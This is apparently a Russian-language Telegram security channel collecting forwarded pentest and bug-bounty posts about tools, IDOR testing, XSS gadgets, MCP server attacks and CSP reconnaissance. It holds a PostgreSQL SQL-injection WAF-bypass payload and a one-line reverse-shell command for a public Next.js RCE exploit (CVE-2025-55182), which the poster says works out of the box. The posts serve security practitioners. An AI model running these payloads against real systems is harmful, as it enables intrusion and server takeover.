IDOR — один из самых распространенных и простых багов. Но знаешь ли ты все фазы тестирования, после которых с уверенностью можно сказать «Здесь нет IDOR»?
Разобрали первую фазу, а остальные — в чек-листе
POST/PUT/DELETE).Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍10
Forwarded from Заметки Слонсера (Slonser)
На неделе спросили раза 4 почему я юзаю Caido, а не Burp Suite
Выкатил ответ маленькой статьей на habr
https://habr.com/ru/articles/967644/
Выкатил ответ маленькой статьей на habr
https://habr.com/ru/articles/967644/
Хабр
Хватит страдать в токсичных отношениях с Burp Suite. Пора быть счастливым с Caido
Предисловие Данная статья посвящена прокси Caido. В русскоязычном пространстве довольно мало материалов, которые посвящены Caido, а в последнее время меня часто спрашивали, почему я использую Caido, а...
👍6👎3
Forwarded from AGI Security
BruteForceAI - AI-Powered Login Brute Force Tool
BruteForceAI — это передовой инструмент для тестирования на проникновение, который радикально меняет традиционные атаки методом подбора паролей, интегрируя большие языковые модели (LLM) для интеллектуального анализа форм. Инструмент автоматически определяет формы входа с помощью ИИ, а затем выполняет сложные многопоточные атаки с использованием моделей поведения, имитирующих человеческое.
BruteForceAI — это передовой инструмент для тестирования на проникновение, который радикально меняет традиционные атаки методом подбора паролей, интегрируя большие языковые модели (LLM) для интеллектуального анализа форм. Инструмент автоматически определяет формы входа с помощью ИИ, а затем выполняет сложные многопоточные атаки с использованием моделей поведения, имитирующих человеческое.
👍3
Forwarded from Заметки Слонсера (Slonser)
Осознал что не все подписаны на меня в соц сети Илона Маска, поэтому возможно буду дублировать сюда некоторые посты
На выходных нашел SQLi в PostgreSQL приложении. Обычно я не пишу про такие находки, но этот случай показался достаточно интересным.
Инъекция была path-based (/api/v2/.../INJECTION_POINT/...), и путь не url декодился. Пробелы, слеши, кавычки и скобки приводили к 400 Bad Request.
Придумал обход используя dollar-quoting синтаксис PostgreSQL:
Как PostgreSQL это парсит:
1. $$0$$ - dollar-quoted строка, автоматически каститься в integer
2. OR - логический оператор
3. -0-$$0$$ - арифметическое выражение
4. NOTNULL - проверка на null (вернет true)
Для этого payload нужны всего два не alphanumeric символа: $ и - (минус можно заменить на +).
Может быть полезно для обхода WAF (например, Cloudflare это не блокирует) или при похожих ограничениях на символы.
На выходных нашел SQLi в PostgreSQL приложении. Обычно я не пишу про такие находки, но этот случай показался достаточно интересным.
Инъекция была path-based (/api/v2/.../INJECTION_POINT/...), и путь не url декодился. Пробелы, слеши, кавычки и скобки приводили к 400 Bad Request.
Придумал обход используя dollar-quoting синтаксис PostgreSQL:
$$0$$OR-0-$$0$$NOTNULL
Как PostgreSQL это парсит:
1. $$0$$ - dollar-quoted строка, автоматически каститься в integer
2. OR - логический оператор
3. -0-$$0$$ - арифметическое выражение
4. NOTNULL - проверка на null (вернет true)
Для этого payload нужны всего два не alphanumeric символа: $ и - (минус можно заменить на +).
Может быть полезно для обхода WAF (например, Cloudflare это не блокирует) или при похожих ограничениях на символы.
👍1
Раньше не принимали отчеты со сканеров, настало время запретить ИИ-галлюцинации (которые тоже могут быть своебразной атакой мусорными отчетами на триаж/дефектовщиков): https://daniel.haxx.se/blog/2025/07/14/death-by-a-thousand-slops/
daniel.haxx.se
Death by a thousand slops
I have previously blogged about the relatively new trend of AI slop in vulnerability reports submitted to curl and how it hurts and exhausts us. This trend does not seem to slow down. On the contrary, it seems that we have recently not only received more…
👍2
Forwarded from Информационная опасность
This media is not supported in the widget
VIEW IN TELEGRAM
Инструмент превращает Chrome DevTools в легковесный аналог Burp Repeater. Можно перехватывать, изменять и повторять любые HTTP(S)-запросы без прокси и сертификатов.
🥷🏿 Зачем нужен
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12
Forwarded from Cybred
Рабочий эксплоит
Спустя сутки после тряски с нейрослопом, его, наконец, написали https://github.com/Spritualkb/CVE-2025-55182-exp (сырой запрос можно найти тут). Работает на любом уязвимом приложении из коробки, я уже проверил сам.
Получить шелл в одну команду можно так
Предварительно надо не забыть поднять слушатель (не смотря на надпись, сам скрипт этого не делает).
Сейчас в интернете находится 8.7 миллионов потенциально уязвимых инстансов, — 69% всех облачных сред используют Next.js — это каждый второй прод в облаке.
Чтобы не проверять их все вручную, для Burp написали готовое расширение, которое проверяет уязвимость в фоне https://github.com/tobiasGuta/Next.js-RSC-RCE-Scanner-Burp-Suite-Extension (в active scan++ тоже добавили)
Спустя сутки после тряски с нейрослопом, его, наконец, написали https://github.com/Spritualkb/CVE-2025-55182-exp (сырой запрос можно найти тут). Работает на любом уязвимом приложении из коробки, я уже проверил сам.
Получить шелл в одну команду можно так
python3 exp.py http://127.0.0.1:3000 --revshell 127.0.0.1 1234
Предварительно надо не забыть поднять слушатель (не смотря на надпись, сам скрипт этого не делает).
Сейчас в интернете находится 8.7 миллионов потенциально уязвимых инстансов, — 69% всех облачных сред используют Next.js — это каждый второй прод в облаке.
Чтобы не проверять их все вручную, для Burp написали готовое расширение, которое проверяет уязвимость в фоне https://github.com/tobiasGuta/Next.js-RSC-RCE-Scanner-Burp-Suite-Extension (в active scan++ тоже добавили)
👍7
GMSGadget (Give Me a Script Gadget) — не список эксплойтов, а библиотека скриптовых гаджетов — небольших фрагментов JavaScript, которые можно использовать для обхода HTML-санитайзеров и CSP.
Проект продолжает идею исследователей из доклада на Black Hat USA 2017 под названием "Breaking XSS Mitigations via Script Gadgets".
Многие кейсы защиты от XSS — CSP, DOMPurify, кастомные фильтры — опираются на строгие правила обработки HTML и JavaScript. Но у самого языка есть «особенности поведения», которые можно превратить в рабочие цепочки для инъекции.
GMSGadget собирает такие гаджеты в одном месте, чтобы тебе не приходилось искать их по блогам, багрепортам и конференциям. Все гаджеты — либо уже исправленные кейсы, либо особенности JavaScript, которые можно использовать для обхода ограничений.
Сервис предоставляет фильтрацию по различным параметрам, что позволяет быстро подобрать технику под конкретный кейс обхода:
В каждой странице гаджета:
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7
Forwarded from AD_POHEQUE
МЕТОДОЛОГИЯ MCPwn'а
знаешь, какие сервисы крутятся рядом с llm?
уверен, что ни один из них не отдаёт тебе внутреннюю сеть по json-rpc / http без аутентификации?
mcp уже в проде: ide, ассистенты, консольные инструменты. для нас это не «новый хайп», а ещё один класс открытых api, где вместо
и да — SSRF, LFI, IDOR и COMMAND INJECTION теперь кайфуют там.
я собрал вводный разбор по атакам на mcp-серверы:
— что это за протокол;
— как искать открытые mcp-endpoint’ы;
— чем полезны damn vulnerable mcp server + mcp-scanner;
— какие векторы уже видно сейчас и как их тестировать в рамках пентеста.
если ты пентестер / оператор red team / appsec инженер и ещё не держишь mcp в модели угроз — ты пропускаешь новую поверхность атаки. через год это будет такой же must-have, как когда-то было «научиться ковырять graphql».
читай и применяй в проектах:
https://teletype.in/@ad_poheque/pentesting_mcp_servers
#Pentest #RedTeam #MLSecOps
👾
знаешь, какие сервисы крутятся рядом с llm?
уверен, что ни один из них не отдаёт тебе внутреннюю сеть по json-rpc / http без аутентификации?
mcp уже в проде: ide, ассистенты, консольные инструменты. для нас это не «новый хайп», а ещё один класс открытых api, где вместо
/api/v1 теперь /mcp. и да — SSRF, LFI, IDOR и COMMAND INJECTION теперь кайфуют там.
я собрал вводный разбор по атакам на mcp-серверы:
— что это за протокол;
— как искать открытые mcp-endpoint’ы;
— чем полезны damn vulnerable mcp server + mcp-scanner;
— какие векторы уже видно сейчас и как их тестировать в рамках пентеста.
если ты пентестер / оператор red team / appsec инженер и ещё не держишь mcp в модели угроз — ты пропускаешь новую поверхность атаки. через год это будет такой же must-have, как когда-то было «научиться ковырять graphql».
читай и применяй в проектах:
https://teletype.in/@ad_poheque/pentesting_mcp_servers
#Pentest #RedTeam #MLSecOps
👾
Вместо того, чтобы просто предлагать расширения, ffufai может анализировать целевое веб-приложение и создавать кастомные словари для фаззинга.
Параметры:
--wordlists — для включения фичи
--max-wordlist-size — для управления размером
--include-response — для включения содержимого страницы и получения еще более разумных предложений
Под капотом скрипт просто делает запрос к OpenAI или Anthropic API, но задумка интересная, согласитесь
Please open Telegram to view this post
VIEW IN TELEGRAM
👎8👍4
Forwarded from Поросёнок Пётр
This media is not supported in your browser
VIEW IN TELEGRAM
Кажется в следующем году в мои финансовые расходы на "ведение бизнеса" войдет лицензия на Caido 🤑
Все больше и больше вижу решений и возможностей от комьюнити. И все меньше вижу подобного со стороны PortSwigger. Только Джеймс периодически рассказывает об очередной desync attacks схемке или об очередном обновлении Turbo Intruder.
Вот отличный пример по использованию Strix. И по мотивам этого примера даже был доклад на последнем NahamCon от Джастина Гарднера.
Все больше и больше вижу решений и возможностей от комьюнити. И все меньше вижу подобного со стороны PortSwigger. Только Джеймс периодически рассказывает об очередной desync attacks схемке или об очередном обновлении Turbo Intruder.
Вот отличный пример по использованию Strix. И по мотивам этого примера даже был доклад на последнем NahamCon от Джастина Гарднера.
👍3
This media is not supported in your browser
VIEW IN TELEGRAM
Content-Security-Policy — это не только механизм безопасности. Это ещё и карта внешних зависимостей приложения
CSP часто копируют между проектами и тянут из шаблонов. Если у двух сайтов одинаковая CSP-политика, велика вероятность, что это одна организация, общая инфраструктура или забытый/тестовый хост.
В результате можно найти новые домены, которые не были в исходном скоупе
Для автоматизации подойдет любой парсер CSP. Например, csprecon ускоряет:
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6